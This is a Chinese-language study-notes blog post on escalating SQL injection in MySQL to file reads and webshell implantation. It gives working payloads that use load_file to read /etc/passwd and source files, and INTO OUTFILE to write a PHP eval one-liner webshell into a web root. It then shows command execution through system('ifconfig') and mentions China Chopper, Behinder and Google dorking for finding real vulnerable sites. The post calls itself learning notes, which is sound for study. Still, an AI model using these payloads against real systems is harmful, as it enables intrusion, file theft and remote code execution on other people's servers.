09-SQL注入--木马植入

SQL查询注入

把数据库拖下来就成功一大半

sql注入进一步操作

文件读写及木马植入

一、读写权限确认

show global variables like '%secure';
查看mysql全局变量的配置,当输入以上命令后,结果为
secure_file_priv = 空的时候,任意读写
secure_file_priv = 某个路径的时候,只能在规定的那个路径下读写
secure_flie_priv = NULL不能读写

二、读文件

利用SQL语句读取系统文件,先读写常规文件(明确文件路径),如果能成功读取,则继续读取其他文件。

如果明确知道路径,则直接尝试爆破路径小的文件,如果连路径都不知道,则爆破路径。

#利用SQL
-1 union select 1,2,3,load_file("C:/windows/server/service.inf"),5,6
-1 union select 1,2,3,load_file("/etc/passwd"),5,6

/security/read.php?id=-1 union select 1,2,3,(select load_file("/opt/lampp/htdocs/security/common.php")),5,6

三、写入木马

http://192.168.74.133/security/read.php?id=-1 union select 1,2,3,"hellowoniu",5,6 into outfile
"/opt/lampp/htdocs/security/temp/muma.php"

-1 union select 1,2,3,4,5,"<?php phpinfo(); ?>" into outflie "D:/xamppnew/htdocs/security/muma.php"

如果列的数量未知,也可以不停地试,然后注入一次,访问一次,确认是否注入成功

-1 union select 1,2,3,4,5,"<?php @eval($_POST['a']); ?>" into outflie "D:/xamppnew/htdocs/security/muma.php"
一句话木马==》用来进行探测==》之后进行大马植入
<?php @eval($_POST['a']); ?>
eval可以将一段字符串当成代码来执行,如果用户可以直接将这段有效的PHP代码传入后台,则可以执行任意代码或指令
植入木马后可以执行以下命令
security/muma2.php?a=phpinfo();
security/muma2.php?a=echo date('Y-m-d' H:i:s');
security/muma.php?a=system('ifconfig');  #PHP执行指令

?php @eval($_POST['123456]) ?>

@表示后面即使执行错误,也不报错。

eval()函数表示括号内的语句字符串什么的全都当做代码执行。

$_POST['123123']表示从页面中获得123123这个参数值,即该木马密码为123123。

四、中国菜刀和冰蝎的使用

去找一个真实的网站存在SQL的漏洞==》怎么去找?只允许探测,不允许利用。

搜索引擎语法

谷歌hack

本篇文章只是作为学习使用,为学习笔记,

  • 10
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值